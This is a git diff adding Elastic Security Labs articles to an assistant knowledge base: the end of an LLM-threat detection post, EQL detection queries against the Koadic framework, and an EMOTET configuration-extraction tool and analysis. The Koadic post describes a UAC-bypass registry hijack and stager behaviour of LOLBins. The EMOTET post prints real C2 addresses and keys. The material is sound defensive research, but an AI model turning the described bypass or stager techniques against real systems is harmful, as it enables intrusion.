+Fortunately, Kibana is already instrumented with APM, so if you configure an APM server, you will automatically start ingesting logs from this source (by setting ```elastic.apm.active: true```). See the [README](https://github.com/elastic/kibana/blob/main/x-pack/plugins/elastic_assistant/server/lib/langchain/tracers/README.mdx) for more details.
+
+## Closing Thoughts
+
+As we continue with this exploration into integrating security practices within the lifecycle of large language models at Elastic, it's clear that embedding security into LLM workflows can provide a path forward for creating safer and more reliable applications. These contrived examples, drawn from our work during OnWeek, illustrate how someone can proactively detect, alert, and triage malicious activity, leveraging the security solutions that analysts find most intuitive and effective. 
+
+It’s also worth noting that with the example proxy approach, we can incorporate a model to actively detect and prevent requests. Additionally, we can triage the LLM response before sending it back to the user if we’ve identified malicious threats. At this point, we have the flexibility to extend our security protections to cover a variety of defensive approaches. In this case, there is a fine line between security and performance, as each additional check will consume time and impede the natural conversational flow that users would expect.
+
+Feel free to check out the proof-of-concept proxy at [llm-detection-proxy](https://github.com/elastic/llm-detection-proxy) and adapt it to fit your needs!
+
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80).
+
+*The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.*
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embracing_offensive_tooling_building_detections_against_koadic_using_eql.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embracing_offensive_tooling_building_detections_against_koadic_using_eql.md
new file mode 100644
index 0000000000000..96971dbc7f207
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embracing_offensive_tooling_building_detections_against_koadic_using_eql.md
@@ -0,0 +1,239 @@
+---
+title: "Embracing offensive tooling: Building detections against Koadic using EQL"
+slug: "embracing-offensive-tooling-building-detections-against-koadic-using-eql"
+date: "2022-06-01"
+description: "Find new ways to build behavioral detections against post-exploitation frameworks such as Koadic using Event Query Language (EQL)."
+author:
+  - slug: daniel-stepanic
+image: "blog-thumb-network-attack-map.jpg"
+category:
+  - slug: security-research
+---
+
+This year at [BSidesDFW](http://www.bsidesdfw.com/), my local security conference, I highlighted a continuing trend of adversaries using open source offensive tools. The [talk](https://docs.google.com/presentation/d/1Wq76DqLzrF2-qxnhWTSXzmuHjBdXoND2tzMw2zeopfs) reviewed one of these post-exploitation frameworks named [Koadic](https://github.com/zerosum0x0/koadic) and walked through different ways defenders can build behavioral detections through the use of [Event Query Language](https://www.endgame.com/blog/technical-blog/introducing-event-query-language) (EQL). In this post, I wanted to review this research by providing background into Koadic and its features, why it’s relevant, and then dive into some EQL examples where I will share different detection strategies against the Koadic framework.
+
+Adversaries continue to adopt open source attack frameworks as part of their toolset. By using these off-the-shelf tools, attackers are able to complete their objectives while reducing their development costs and present attribution problems for incident responders. These tools challenge traditional investigative techniques by creating the idea of plausible deniability and leave fewer toolmarks that can be traced back to an adversary. Even with strong threat intelligence capabilities and proper defensive visibility, it’s not always an easy task to differentiate red team operations from real adversary behavior — especially in the early phases of an attack.
+
+As defenders, we are required to actively monitor offensive open source projects. These projects serve as canaries in a coal mine, giving us an opportunity to gain insights into new attacker tradecraft. Not only does this get us into an attacker mindset, but all the code is freely available for emulation and review. Some different ways to get value from dissecting these tools can be through validating your detection capabilities, generating new analytics, developing threat hunting hypotheses, or by simply transferring knowledge around an underlying behavior.
+
+### Why Koadic?
+
+Koadic is a great candidate to demonstrate behavior-based detections due its interesting way of leveraging technologies built into the Windows OS — such as Windows Script Host (WSH) and the Component Object Model (COM). COM and WSH fall into the general category of “living off the land” tools, which allow adversaries to proxy the execution of their toolset through [built-in Windows programs](https://github.com/LOLBAS-Project/LOLBAS/tree/master/yml/OSBinaries).
+
+This can be very desirable from an attacker’s standpoint, as it allows them to blend in better within the network while producing less of a forensic footprint — rather than dropping and executing a file on disk. COM and WSH are particularly attractive to attackers because of a lack of robust, built-in logging capabilities in contrast to tools like PowerShell (for which Windows has added extensive logging capabilities in newer versions). Koadic is good enough for mature threat groups such as [APT28](https://attack.mitre.org/groups/G0007/) and has received frequent updates over the last couple years.
+
+![Koadic overview](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/features_koadic.png)
+
+_Koadic overview & features_
+
+### EQL
+
+Some of the more exciting parts of my job as a practitioner come when writing behavioral detections using EQL. This process brings out my inner detective skills that I find to be fulfilling and challenging at the same time. The language enables practitioners to go beyond matching static values such as Indicators of Compromise (IoCs) to a much more comprehensive and flexible way to detect adversary behaviors. With the ability to leverage features like time-bound sequencing or track process lineage, more options are opened up to us as defenders to build reliable and lasting detections.
+
+I find this to be rewarding, as I can directly apply my previous SOC work experience around host-based forensics into a much more dynamic detection that holds up against the latest attacker tradecraft. The best part is that EQL has a very simple syntax with a short learning curve, so if you aren’t able to adopt EQL today, hopefully the logic within these queries can be applied to your current solution.
+
+For a quick recap into the language itself and its core capabilities, I recommend reviewing our previous blog post: [Introducing Event Query Language](https://www.endgame.com/blog/technical-blog/introducing-event-query-language). In summary, EQL is a schema-independent and OS-agnostic language built for real-time detection with stream processing. It supports multiple-event behaviors and also offers post-processing commands used to analyze large amounts of data. With that background, let’s start diving into some of the different ways to detect Koadic using EQL.
+
+### Initial access
+
+**Spearphishing Attachment (**[**T1193**](https://attack.mitre.org/techniques/T1193/)**)**
+
+Validating parent-child process relationships continues to be a fruitful technique for hunting and building detections. As attacker activity becomes more evasive, however, we also have a need for flexibility as defenders. This first example shows off the value of tracking process ancestry using EQL’s descendant function, which lets us maintain state and track full process genealogy. This is an important concept because it goes beyond the typical parent-child process paradigm that many languages are limited to.
+
+By tracking further descendant processes, defenders have the ability to follow process chains infinitely down the process tree. This provides more freedom in how we can express suspicious behavior together while also allowing tighter controls around process ancestry.
+
+![Descendant process tree](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/mshta_descendant.jpg)
+
+_Descendant process tree visualization (APT28)_
+
+This process chain comes from a sample [reported](https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/) by Palo Alto Networks in June 2018 associated with [APT28](https://attack.mitre.org/groups/G0007/) activity. In this EQL expression, we are monitoring all descendant processes of our email client (Outlook.exe) and only looking for new process creation events tied to [Mshta](https://attack.mitre.org/techniques/T1170/). This allows us to focus on the initial attack vector (Spearphishing email) and then filter on Windows programs being used to execute attacker code. This is a great foundation for strong analytics — if we wanted to create something more robust, we could build out a longer array of cohorts associated with initial compromise stages, as well as add the entire Microsoft Office suite as descendants.
+
+![Initial access and execution - spearfishing](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/intial_access_mshta_eql.png)
+
+_Initial access & execution - Spearphishing example_
+
+EQL query:
+
+```
+process where process_name == "mshta.exe" and descendant of
+[process where process_name == "outlook.exe"]
+```
+
+### Defense evasion/execution
+
+**Mshta (**[**T1170**](https://attack.mitre.org/techniques/T1170/)**), Rundll32 (**[**T1085**](https://attack.mitre.org/techniques/T1085/)**)**
+
+Tools like Koadic often include some usability features that help facilitate payload building, also known as [stagers](https://github.com/zerosum0x0/koadic/tree/master/data/stager/js). These small pieces of code get executed on the victim machine and are used to establish a network connection back to the attacker in order to bring in a staged payload for execution. Stagers represent a significant portion of the early phases of the intrusion process. The following example continues exploring the detection strategy for a variety of Windows utilities used to proxy execution with Koadic stagers.
+
+The EQL query below uses the sequence operator, a function of EQL that matches based on the order of events in a sequence. In this case, we are matching when one of these standard Windows administration utilities initiates a network connection. Where another language might require an analyst to write several rules — one for each of these utilities — EQL enables us to build an array capable of matching many permutations.
+
+Using the filter operator joins these events in sequence by their process identifier (PID). I like this example because it’s capable of detecting malware and other offensive tools that aren’t specific to Koadic. With that said, it might take a little filtering to remove potentially benign events such as network administrative activity, but this kind of behavior is something every organization should be tracking and reviewing on a certain cadence.
+
+![Defense evasion and execution - Mshta](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/defense_evasion_stager.PNG)
+
+_Defense evasion & execution - stagers_
+
+EQL query:
+
+```
+sequence by unique_pid
+[process where subtype.create and process_name in
+("mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe")]
+[network where process_name in
+("mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe")]
+```
+
+One of the more interesting takeaways when reviewing offensive tooling is finding the different artifacts that get left behind unintentionally. All it takes is one “loud” artifact, such as a file or registry modification that sticks out, to quickly find suspicious activity.
+
+In Koadic’s case, HTTP stagers use Internet Explorer’s core architecture to make a web request by default, which causes the stager to be created within the Temporary Internet Files directory. This behavior occurs due to the way Internet Explorer caches browser content to quickly load web pages. Monitoring this kind of behavior with certain executables can lead to reliable detections outside Koadic, such as generic [cradles](https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html) used to download and execute malicious code.
+
+![Defense evasion & execution - cached stager](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/cached_stager.jpg)
+
+_Defense evasion & execution - cached stager_
+
+EQL query:
+
+```
+file where process_name in
+("mshta.exe","regsvr32.exe", "rundll32.exe", "wmic.exe")
+and subtype.create and file_path == "*Content.IE5*"
+```
+
+### Discovery
+
+**Account Discovery (**[**T1087**](https://attack.mitre.org/techniques/T1087/)**), Remote System Discovery (**[**T1096**](https://attack.mitre.org/techniques/T1018/)**)**
+
+![Discovery - macro](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/macro.png)
+
+_Discovery - macro_
+
+A feature of EQL is the ability to share or reuse similar logic between queries. By using macro declaration, we can bundle a collection of items together and call the array like a variable. A good example would be grouping Microsoft Office applications into a macro, or, in this case, several different Windows programs that can be used for discovery and enumeration.
+
+EQL query (macro):
+
+```
+macro KOADIC_DISCOVERY(name)
+name in (
+"arp.exe", "findstr.exe", "hostname.exe", "ipconfig.exe",
+"nbtstat.exe", "net.exe", "net1.exe", "netsh.exe",
+"nltest.exe", "ping.exe", "systeminfo.exe", "tasklist.exe",
+"tracert.exe", "whoami.exe"
+)
+```
+
+The Elastic Endpoint Resolver view below helps provide some context about how Koadic spawns child processes. By using the Koadic module (exec_cmd), and running a natively supported command such as “whoami /groups”, we can see the Rundll32.exe application was invoked by WmiPrvse.exe and passes instructions down to the command prompt before launching the Whoami.exe application.
+
+![Elastic Endpoint Resolver](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/resolver.jpg)
+
+_Elastic Endpoint Resolver visualization_
+
+Now that we have a better understanding of the attack chain, let’s tie our previous macro (KOADIC_DISCOVERY) into a sequence-based detection looking for three process creation events from any one of those enumeration programs within a period of 10 minutes, executed by the same user. This same feature would let you monitor for processes that were previously observed. For example, maybe 15 days later the process makes a network connection to pull down an additional payload. What other language lets you find long-term payloads that sit dormant for weeks or months?
+
+EQL query:
+
+```
+sequence by user_name with maxspan=10m
+[process where subtype.create and KOADIC_DISCOVERY(process_name)]
+[process where subtype.create and KOADIC_DISCOVERY(process_name)]
+[process where subtype.create and KOADIC_DISCOVERY(process_name)]
+| unique user_name
+```
+
+The query above is fully-functional and can be used as a generic detection for initial discovery and enumeration. But what if we had some reason to tighten the logic around Koadic specifically? Understanding the process genealogy of Koadic at the endpoint level, we can leverage different process relationship tracking functions in EQL such as **child of** and **descendant of**.
+
+By using the **child of** function and setting the parent process to Rundll32.exe, we are essentially getting the grandchildren of Rundll32.exe. Then if we wanted to take it even further, we can add the **descendant of** parent process WmiPrvse.exe. This example demonstrates the flexibility of EQL to provide powerful detection capabilities for real adversary behavior.
+
+![Process tree visualization - child of and descendant of](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/grandchild_descendant.jpg)
+
+_Process tree visualization - child of and descendant of_
+
+EQL query:
+
+```
+sequence by user_name with maxspan=10m
+[process where child of [process where parent_process_name == "rundll32.exe"]
+and KOADIC_DISCOVERY(process_name) and
+descendant of [process where parent_process_name == "wmiprvse.exe"]]
+[process where child of [process where parent_process_name == "rundll32.exe"]
+and KOADIC_DISCOVERY(process_name) and
+descendant of [process where parent_process_name == "wmiprvse.exe"]]
+| unique user_name
+```
+
+### Privilege escalation
+
+**Bypass User Account Account (**[**T1088**](https://attack.mitre.org/techniques/T1088/)**)**
+
+While attackers control targeting of victims in many cases, they don’t always wind up with an elevated user during initial compromise. Even when a spearphishing victim is a local administrator, the attacker will oftentimes need to escalate from a Medium to High integrity process before continuing. Off-the-shelf offensive tools like Koadic can enable that transition with relative ease, including several different UAC Bypass modules out of the box.
+
+For this example, we’ll examine a well-known UAC Bypass technique published by Matt Nelson ([@enigma0x3](https://twitter.com/enigma0x3?s=20)) while leveraging the Computer Management launcher — CompMgmtLauncher.exe — which is interoperable with the Microsoft Management Console (MMC). Details about this technique, which still works on Windows 7 endpoints, can be found [here](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/).
+
+This technique involves modifying the Windows Registry to change the default association of files the MMC interacts with (HKCU\Software\Classes\mscfile\shell\open\command) to an application of the attacker’s choice. By deploying a malicious script object with a compatible extension and altering this registry key value to launch a built-in script interpreter, an adversary is able to circumvent controls.
+
+Right after this registry modification, look for the new process creation event tied to the auto-elevated Microsoft program (CompMgmtLauncher.exe), followed by common Koadic stager descendant processes such as Mshta.exe or Rundll32.exe — processes that should be running in a high integrity context. We can combine those events into an ordered sequence and constrain the total run-time for all the steps to complete within 10 seconds.
+
+![Privilege escalation - UAC bypass](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/privilege_escalation.png)
+
+_Privilege escalation - UAC bypass_
+
+EQL query:
+
+```
+sequence with maxspan=10s
+[registry where length(bytes_written_string) \> 0 and key_type in
+("sz", "expandSz") and key_path == "*\\mscfile\\shell\\open\\command\\"
+and user_name != "SYSTEM"]
+[process where process_path == "C:\\Windows\\System32\\CompMgmtLauncher.exe"]
+[process where process_name in ("mshta.exe","rundll32.exe") and
+integrity_level == "high"]
+```
+
+### Collection/exfiltration
+
+**Data from Local System (**[**T1005**](https://attack.mitre.org/techniques/T1005/)**)**
+
+Koadic’s method of C2 may be interesting to analysts of several kinds due to the transactional way it exchanges data between implants and server. This behavior is highlighted through some direct examples of specific commands executed below:
+
+![Specific commands](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/koadic_redirection.PNG)
+
+_Command shell redirection into text files_
+
+Koadic redirects STDOUT/STDERR to a temporary text file that stores the output of the operator’s commands as they were presented to the server. These commands are then read back into the Koadic C2 terminal. One second after this file is initially created, it is automatically deleted.
+
+With the right endpoint visibility, malicious behaviors you might be incapable of otherwise detecting stand out. To demonstrate a detection around this, we will use the event of function to filter only for processes that come from cmd.exe that contain a redirector (\\>), then tie the PID of that process to same PID that performed file activity related to the text (.txt) file activity.
+
+EQL query:
+
+```
+file where file_name == "*.txt" and
+event of [process where process_name == "cmd.exe" and command_line == "*\>*"]
+```
+
+![Example results](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/files_created.PNG)
+
+_Example results showing file modification_
+
+If you wanted to get more context, such as what command was passed from Koadic, we can turn the detection into a sequence and add the process event.
+
+EQL query:
+
+```
+sequence with maxspan=5s by unique_pid
+[process where subtype.create and process_name == "cmd.exe" and command_line == "*\>*" and
+descendant of [process where process_name == "wmiprvse.exe"]]
+[file where subtype.create and wildcard(file_name, "*.txt", "*.log")]
+```
+
+![Example results](/assets/images/embracing-offensive-tooling-building-detections-against-koadic-using-eql/results2.jpg)
+
+_Example results combining process and file modification_
+
+### Conclusion
+
+To summarize, we analyzed one offensive framework (Koadic) and several of its prominent features, reviewed a flexible query language (EQL) to express detection logic, and stepped through several ways to identify behavior tied to Koadic with example analytics.
+
+I see the availability of offensive frameworks like Koadic as an opportunity for defenders, and a motivation to stay vigilant. Thinking creatively about how to detect these post-exploitation behaviors and assessing how these tools perform against their own detection capabilities will put an organization on a path to greater success in stopping similar threats.
+
+To help enable organizations, we’ve added all the queries in this post into the [EQLLib repository](https://eqllib.readthedocs.io/en/latest/analytics.html). For readers interested in the original presentation from BSidesDFW this year, here is a link to the [slides](https://docs.google.com/presentation/d/1Wq76DqLzrF2-qxnhWTSXzmuHjBdXoND2tzMw2zeopfs/edit?usp=sharing).
+
+[EQL support is being added to Elasticsearch.](https://github.com/elastic/elasticsearch/issues/49581)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_configuration_extractor.md
new file mode 100644
index 0000000000000..8c40142da37f7
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_configuration_extractor.md
@@ -0,0 +1,68 @@
+---
+title: "EMOTET Configuration Extractor"
+slug: "emotet-configuration-extractor"
+date: "2022-12-06"
+subtitle: "Configuration extraction tool for the EMOTET malware."
+description: "Python script to extract the configuration from EMOTET samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - emotet
+---
+
+Python script to extract the payload from EMOTET samples.
+
+[Download emotet-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte2addf7080c31792/635ad4a5a739cc5f6cbd595e/emotet-configuration-extractor.tar.gz)
+
+> For information on the EMOTET malware check out the following resources:
+>
+> - [EMOTET Dynamic Configuration Extraction](https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction)
+
+## Getting started
+
+### Docker
+
+The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.
+
+```
+docker build . -t emotet-config-extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the docker container directory.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data emotet-config-extractor:latest --help
+```
+
+### Running it locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+emotet-config-extractor --help
+```
+
+## Usage
+
+All samples need to be unpacked prior to execution extraction attempts.
+
+Our extractor takes either a directory of samples with **-d** option or **-f** for a single sample and then can output parts of the configuration of note, specifically:
+
+- **-k** : extract the encryption keys
+- **-c** : extract the C2 information
+- **-s** : extract the wide-character strings
+- **-a** : extract the ASCII character strings
+
+```
+docker run -ti --rm -v $(pwd)/data:/data emotet-config-extractor:latest -d "C:\tmp\samples"
+```
+
+![EMOTET configuration extractor](/assets/images/emotet-configuration-extractor/image.jpg)
+
+You can collect the extracted configurations from the directory you set when running the extractor.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_dynamic_configuration_extraction.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_dynamic_configuration_extraction.md
new file mode 100644
index 0000000000000..af4f0feaac3c0
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/emotet_dynamic_configuration_extraction.md
@@ -0,0 +1,334 @@
+---
+title: "EMOTET Dynamic Configuration Extraction"
+slug: "emotet-dynamic-configuration-extraction"
+date: "2022-12-01"
+subtitle: "A tool for the dynamic extraction of EMOTET configurations based on emulation."
+description: "Elastic Security Labs discusses the EMOTET trojan and is releasing a tool to dynamically extract configuration files using code emulators."
+author:
+  - slug: remco-sprooten
+image: "lock-code-combination-configuration.jpg"
+category:
+  - slug: security-research
+tags:
+  - emotet
+---
+
+## Key takeaways
+
+- The EMOTET developers have changed the way they encode their configuration in the 64bit version of the malware.
+- Using code emulation we can bypass multiple code obfuscation techniques.
+- The use of code emulators in config extractors will become more prevalent in the future.
+
+> To download the EMOTET configuration extractor, check out our post on the tool:
+>
+> - [EMOTET configuration extractor](https://www.elastic.co/security-labs/emotet-configuration-extractor)
+
+## Preamble
+
+The [EMOTET](https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet) family broke onto the malware scene as a [modular banking trojan in 2014](https://web.archive.org/web/20140701001622/https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/), focused on harvesting and exfiltrating bank account information by inspecting traffic. EMOTET has been adapted as an early-stage implant used to load other malware families, such as [QAKBOT](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern), [TRICKBOT](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Trickbot.yar), and [RYUK](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Ransomware_Ryuk.yar). While multiple EMOTET campaigns have been dismantled by international law enforcement entities, it has continued to operate as one of the most prolific cybercrime operations.
+
+For the last several months, Elastic Security has observed the EMOTET developers [transition](https://twitter.com/Cryptolaemus1/status/1516261512372965383?ref_src=twsrc%5Etfw) to a 64-bit version of their malware. While this change does not seem to impact the core functionality of the samples we have witnessed, we did notice a change in how the configuration and strings are obfuscated. In earlier versions of EMOTET, the configuration was stored in an encrypted form in the **.data** section of the binary. In the newer versions the configuration is calculated at runtime. The information we need to extract the configuration from the binary is thus hidden within the actual code.
+
+In the next sections, we’ll discuss the following as it relates to 64-bit EMOTET samples:
+
+- EMOTET encryption mechanisms
+- Reviewing the EMOTET C2 list
+- Interesting EMOTET strings
+- The EMOTET configuration extractor utility
+
+## Encryption keys
+
+EMOTET uses embedded [Elliptic Curve Cryptography](https://blog.cloudflare.com/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography/) (ECC) public keys to encrypt their network communication. While in previous versions, the keys would be stored in an XOR-encrypted blob, now the content is calculated at runtime.
+
+![Encoded Encryption Key blob in 64-bit version](/assets/images/emotet-dynamic-configuration-extraction/image14.jpg)
+
+In comparison the previous versions of EMOTET would store an encrypted version of the key data in the . **text** section of the binary.
+
+![Embedded key data in previous version of the malware](/assets/images/emotet-dynamic-configuration-extraction/image10.jpg)
+
+In order to make it harder for security researchers to find the given code the malware uses [Mixed Boolean-Arithmetic](https://www.usenix.org/conference/usenixsecurity21/presentation/liu-binbin) (MBA) as one of its obfuscation techniques. It transforms constants and simple expressions into expressions that contain a mix of Boolean and arithmetic operations.
+
+![Example of Mixed Boolean-Arithmetic](/assets/images/emotet-dynamic-configuration-extraction/image6.jpg)
+
+In this example, an array of constants is instantiated, but looking at the assembly we see that every constant is calculated at runtime. This method makes it challenging to develop a signature to target this function.
+
+We noticed that both the [Elliptic Curve Diffie-Hellman](https://cryptobook.nakov.com/asymmetric-key-ciphers/ecdh-key-exchange) (ECDH) and [Elliptic Curve Digital Signature Algorithm](https://cryptobook.nakov.com/digital-signatures/ecdsa-sign-verify-messages) (ECDSA) keys use the same function to decode the contents.
+
+The ECDH key (which you can recognize by its magic ECK1 bytes) is used for encryption purposes while the ECDSA key (ECC1) is used for verifying the C2 server's responses.
+
+![ECK1 magic bytes at the start of the key data](/assets/images/emotet-dynamic-configuration-extraction/image4.jpg)
+
+![Decoding algorithm for the key material](/assets/images/emotet-dynamic-configuration-extraction/image11.jpg)
+
+By leveraging a YARA signature to find the location of this decode function within the EMOTET binary we can observe the following process:
+
+1. Find the decoding algorithm within the binary.
+2. Locate any Cross References ([Xrefs](https://hex-rays.com/blog/igor-tip-of-the-week-16-cross-references/)) to the decoding function.
+3. Emulate the function that calls the decoding function.
+4. Read the resulting data from memory.
+
+As we mentioned, we first find the function in the binary by using YARA. The signature is provided at the [end of this article](https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction#yara). It is worth pointing out that these yara signatures are used to identify locations in the binary but are, in their current form, not usable to identify EMOTET samples.
+
+In order to automatically retrieve the data from multiple samples, we created a configuration extractor. In the snippets below, we will demonstrate, in a high level fashion, how we collect the configuration information from the malware samples.
+
+![Python code to find the start of a function](/assets/images/emotet-dynamic-configuration-extraction/image7.jpg)
+
+In the above code snippet:
+
+1. First load the YARA signature.
+2. Try to find a match, and if a signature is found in the file.
+3. Calculate the function offset based on the offset in the file.
+
+In order to locate the Xrefs to this function, we use the excellent [SMDA decompiler](https://github.com/danielplohmann/smda). After locating the Xrefs, we can start the emulation process using the CPU emulator, [Unicorn](https://www.unicorn-engine.org/).
+
+![Python code used to emulate decoding functions](/assets/images/emotet-dynamic-configuration-extraction/image8.jpg)
+
+1. Initialize the Unicorn emulator.
+2. Load the executable code from the PE file into memory.
+3. Disassemble the function to find the return and the end of the execution.
+4. The binary will try to use the windows [HeapAlloc API](https://learn.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc) to allocate space for the decoded data. Since we don't want to emulate any windows API's, as this would add unnecessary complexity, we hook to code so that we can allocate space ourselves.
+5. After the emulation has run the 64-bit “long size” register ([RAX](https://www.cs.uaf.edu/2017/fall/cs301/lecture/09_11_registers.html#:~:text=rax%20is%20the%2064%2Dbit,processors%20with%20the%2080386%20CPU.)), it will contain a pointer to the key data in memory.
+6. To present the key in a more readable way, we convert it to the standard PEM format.
+
+By emulating the parts of the binary that we are interested in, we no longer have to statically defeat the obfuscation in order to retrieve the hidden contents. This approach adds a level of complexity to the creation of config extractors. However, since malware authors are adding ever more obfuscation, there is a need for a generic approach to defeating these techniques.
+
+![Example of the extractor used to find key material](/assets/images/emotet-dynamic-configuration-extraction/image3.jpg)
+
+## C2 server list
+
+An important part of tracking malware families is to get new insights by identifying and discovering which C2 servers they use to operate their network.
+
+In the 64-bit versions of EMOTET, we see that the IP and port information of the C2 servers are also dynamically calculated at runtime. Every C2 server is represented by a function that calculates and returns a value for the IP address and the port number.
+
+![Examples of encoded IP/port combination](/assets/images/emotet-dynamic-configuration-extraction/image13.jpg)
+
+These functions don’t have a direct cross reference available for searching. However, a procedure references all the C2 functions and creates the **p_c2_list** array of pointers.
+
+![C2 server list](/assets/images/emotet-dynamic-configuration-extraction/image1.jpg)
+
+After that, we can emulate every C2-server function individually to retrieve the IP and port combination as seen below.
+
+![Example of the extractor used to find C2 server list](/assets/images/emotet-dynamic-configuration-extraction/image9.jpg)
+
+## Strings
+
+The same method is applied to the use of strings in memory. Every string has its own function. In the following example, the function would return a pointer to the string **%s\regsvr32.exe "%s"**.
+
+![Encoded string](/assets/images/emotet-dynamic-configuration-extraction/image15.jpg)
+
+All of the EMOTET strings share a common function to decode or resolve the string at runtime. In the sample that we are analyzing here, the string resolver function is referenced 29 times.
+
+![String decoding algorithm](/assets/images/emotet-dynamic-configuration-extraction/image2.jpg)
+
+This allows us to follow the same approach as noted earlier in order to decode all of the EMOTET strings. We pinpoint the string decoding function using YARA, find the cross-references, and emulate the resulting functions.
+
+![Example of the extractor used to find strings](/assets/images/emotet-dynamic-configuration-extraction/image12.jpg)
+
+## Configuration extractor
+
+Automating the payload extraction from EMOTET is a crucial aspect of threat hunting as it gives visibility of the campaign and the malware deployed by the threat actors, enabling practitioners to discover new unknown samples in a timely manner.
+
+```
+% emotet-config-extractor --help
+usage: Emotet Configuration Extractor [-h] (-f FILE | -d DIRECTORY) [-k] [-c] [-s] [-a]
+
+options:
+  -h, --help            show this help message and exit
+  -f FILE, --file FILE  Emotet sample path
+  -d DIRECTORY, --directory DIRECTORY
+                        Emotet samples folder
+  -k                    Extract Encryption keys
+  -c                    Extract C2 information
+  -s                    Extract strings
+  -a                    Extract strings (ascii)
+```
+
+Our extractor takes either a directory of samples with **-d** option or **-f** for a single sample and then can output parts of the configuration of note, specifically:
+
+- **-k** : extract the encryption keys
+- **-c** : extract the C2 information
+- **-s** : extract the wide-character strings
+- **-a** : extract the ASCII character stings
+
+EMOTET uses a different routine for decoding wide and ASCII strings. That is why the extractor provides flags to extract them separately.
+
+The C2 information displays a list of IP addresses found in the sample. It is worth noting that EMOTET downloads submodules to perform specific tasks. These submodules can contain their own list of C2 servers. The extractor is also able to process these submodules.
+
+The submodules that we observed do not contain encryption keys. While processing submodules you can omit the **-k** flag.
+
+```
+[...]
+[+] Key type: ECK1
+[+] Key length: 32
+-----BEGIN PUBLIC KEY-----
+MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
+NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
+-----END PUBLIC KEY-----
+[...]
+[+] Key type: ECS1
+[+] Key length: 32
+-----BEGIN PUBLIC KEY-----
+MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
+lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
+-----END PUBLIC KEY-----
+[...]
+[+] Found 64 c2 subs
+174.138.33.49:7080
+188.165.79.151:443
+196.44.98.190:8080
+[...]
+[+] Starting emulation
+[+] String BLOB address: 0x4000000
+KeyDataBlob
+[...]
+[+] String BLOB address: 0x4000000
+bcrypt.dll
+[...]
+[+] String BLOB address: 0x4000000
+RNG
+```
+
+To enable the community to further defend themselves against existing and new variants of EMOTET, we are making the payload extractor open source under the Apache 2 License. Access the [payload extractor documentation and binary download](https://www.elastic.co/security-labs/emotet-configuration-extractor).
+
+## The future of EMOTET
+
+The EMOTET developers are implementing new techniques to hide their configurations from security researchers. These techniques will slow down initial analysis, however, EMOTET will eventually have to execute to achieve its purpose, and that means that we can collect information that we can use to uncover more about the campaign and infrastructure. Using code emulators, we can still find and extract the information from the binary without having to deal with any obfuscation techniques. EMOTET is a great example where multiple obfuscation techniques make static analysis harder. But of course, we expect more malware authors to follow the same example. That is why we expect to see more emulation-based configuration extract in the future.
+
+![EMOTET running and gathering system information](/assets/images/emotet-dynamic-configuration-extraction/image5.png)
+
+## Detection
+
+### YARA
+
